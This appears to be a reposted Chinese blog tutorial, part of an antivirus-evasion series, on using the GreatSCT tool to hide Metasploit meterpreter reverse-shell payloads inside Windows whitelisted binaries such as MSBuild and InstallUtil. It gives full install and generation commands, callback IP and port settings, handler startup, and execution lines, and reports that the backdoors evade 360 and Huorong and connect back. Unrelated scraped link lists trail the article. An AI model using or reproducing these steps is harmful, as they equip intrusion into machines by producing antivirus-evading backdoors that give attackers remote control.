转载:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ

免杀能力一览表


几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。

一、GreatSCT介绍

GreatSCT可以基于Metasploit、自定义shellcode、powershell等生成payload,然后可利用多种白名单程序进行加载,从而达到免杀的目的。

支持的6种白名单方式:

1、Installutil.exe:安装程序工具是一款命令行工具,允许您通过运行安装程序组件来安装和卸载特定程序集中的服务器资源。

2、Msbuild.exe:Microsoft Build Engine是一个用于构建应用程序的平台。这个引擎,也称为MSBuild。

3、Mshta.exe:Mshta.exe运行Microsoft HTML应用程序,Windows OS实用程序负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。

4、Regasm.exe:程序集注册工具读取程序集内的元数据,并将必要的记录添加到注册表中,从而允许COM客户端透明地创建.NET框架类。

5、Regsvcs.exe:RegSvcs表示Microsoft .NET远程注册表服务,它以.NET服务安装著称。

6、Regsvr32.exe:Regsvr32是一个命令行实用程序,用于在Windows注册表中注册和取消注册OLE控件,例如DLL和ActiveX控件。

二、安装GreatSCT

GreatSCT依赖于python3环境,python2无法正常执行,而且操作系统建议kali或者parrot,其他系统还需要额外安装msf。

1、从github上Clone到本地


git clone https://github.com/GreatSCT/GreatSCT.git

2、执行安装程序


cd GreatSCT/setupsudo ./setup.sh -c

3、注意事项

看安装命令比较简单,但其实里面安装的依赖程序还是挺多的。

比如其中有行安装代码是这样的


apt-get -y -qq install mono-complete mono-mcs unzip wget git ruby p7zip wine wine32 wine64 winbind

看起来也没什么问题,但装着装着可能就各种异常了。

如果安装时出现异常,可以根据setup.sh内容自己逐项的去安装解决。

三、GreatSCT使用说明

使用命令python3 GreatSCT.py -h可以查看帮助说明

比较常用的几个参数:

GreatSCT Options:--update      更新GreatSCTk.--version     显示版本.--list-tools  列出GreatSCT所有的可用工具(模块),不过目前只有Bypass这一个模块-t Bypass     指定待使用的模块,因为只有bypass,所以就只能用-t Bypass了Callback Settings:--ip IP, --domain IP  指定回连的IP--port Port           指定回连的端口[*] Payload Settings:--list-payloads       列出所有的可用payload--generate-awl        利用所有模块批量免杀后门Great Scott Options:-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]自定义payload选项-o OUTPUT NAME        指定生产后门文件的名字-p [PAYLOAD]          指定后门使用的payload--clean               清除输出文件夹--msfoptions [OPTION=value [OPTION=value ...]]指定msf选项--msfvenom [windows/meterpreter/reverse_tcp]利用Msfvenom生成shellcode

其中–list-payloads的使用方法是python3 GreatSCT.py -t Bypass --list-payloads,可使用的26个payload。

看名称也很容易判断出各payload的作用,主要是生成相应shellcode后,使用installutil、msbuild、regasm、regsvcs等白名单程序来执行。和专题19中的工具nps_payload原理差不多,只不过GreatSCT支持的白名单更多一些。

其中–generate-awl用法是python3 GreatSCT.py -t Bypass --generate-awl --ip 10.211.55.2 --port 3333,使用payload批量生成免杀后门。

四、利用GreatSCT生成后门

4.1 交互式生成单个后门

GreatSCT提供了傻瓜式的交互模式生成后门
执行python3 GreatSCT.py

输入list可查看所有支持的工具模块,只有一个

输入use 1或者use Bypass可使用该模块,并进入到payload选择中

输入list可查看所有模块

输入use 序号可选择使用对应payload,我这里就选msbuild/meterpreter/rev_https.py了,也就是use 8。进入参数设置。

一般只需要设置LHOST和LPORT就可以

输入generate后开始生成后门文件,还会提示输入文件名,不输入的话会默认为payload

启动metasploit,可直接执行msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

把/usr/share/greatsct-output/source/payload.xml文件拷贝到测试机上。

使用命令C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe payload.xml来进行加载。

可正常上线

打开杀软,动态+静态都没有提示

4.2 参数式生成单个后门

GreatSCT可以使用参数自动生成shellcode,比较方便快捷。

以基于installutil的shellcode为例进行测试。


python3 GreatSCT.py --ip 10.211.55.2 --port 3333 -t Bypass -p installutil/meterpreter/rev_https.py

生成文件成功

生成的payload.exe不能直接执行,需要使用InstallUtil.exe来执行。

执行命令C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload.exe
可免杀,正常上线。

4.3 批量生成后门

还可以使用命令python3 GreatSCT.py -t Bypass --generate-awl --ip 10.211.55.2 --port 3333来批量生成后门文件,这样每个payload对应一个后门。

执行后会在文件夹中生成类似的下列文件,自己可以逐一测试。

五、GreatSCT小结

GreatSCT由于是基于白名单的文件加载,所以生成的.xml或.dll之类免杀效果比较好,而.exe文件免杀效果就比较一般了,所以可以根据具体情境去结合使用。GreatSCT提供了6中白名单方式,综合免杀效果还算可以。

六、参考资料

官方github:https://github.com/GreatSCT/GreatSCT

GreatSct -应用程序白名单bypass工具:https://www.cnblogs.com/backlion/p/10493919.html

远控免杀专题(20)-GreatSCT免杀相关推荐

  1. 远控免杀专题(9)-Avet免杀(VT免杀率14/71)

    本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...

  2. 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  3. 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  4. 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  5. 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  6. 远控免杀专题(22)-SpookFlare免杀

    转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...

  7. 远控免杀专题(19)-nps_payload免杀

    免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterper ...

  8. 远控免杀专题9 --- Avet免杀

    0x01 免杀能力一查表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...

  9. 远控免杀专题3---msf自免杀

    0x01 免杀能力一览表 上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/ ...

最新文章

  1. 这份HCIE-Routing Switching笔试试题,你能答对几道?
  2. 华为云客户端_效果图云渲染已成趋势,云渲染如何选择?
  3. 政企应用如何构筑安全合规的互联内容分发加速?
  4. mysql 上一篇_mysql取上一篇和下一篇的查询
  5. SpringMVC 返回json的两种方式
  6. matlab 自带例子,matlab自带各种分类器的使用示例
  7. NOIP2017提高组Day2T1(奶酪)题解
  8. Xv6 Page Table
  9. java简单的sql语句--增删改查(CRUD)
  10. 【最优化基础】惩罚和障碍函数
  11. 使用Md5加密算法对密码进行加密(工具类)
  12. 【python 目标检测】基于深度学习的道路破损检测|yolov5|VOC
  13. 【二〇二一·立秋】读书笔记
  14. 古代五大美男的悲惨结局:潘安被灭三族
  15. 分别统计其中数字、英文字母和其它字符的个数
  16. 用户增长——Cohort Analysis 留存分析(三)
  17. PowerDesigner根据数据库生成数据字典
  18. 使用Eclipse Memory Analyzer分析Tomcat内存溢出
  19. python更改文件路径_更换路径python
  20. 使用ADB命令连接手机、发送广播

热门文章

  1. vue给input file绑定函数获取当前上传的对象
  2. 消除switch语句以获得更好的代码结构
  3. border-sizing属性详解和应用
  4. 树-二叉树、满二叉树和完全二叉树
  5. JS 循环遍历 总结
  6. windows下揪出java程序占用cpu很高的线程
  7. 面向对象设计与构造第一次总结作业
  8. Python_迭代器与生成器
  9. MST:Bad Cowtractors(POJ 2377)
  10. ORACLE连接数据库(备忘)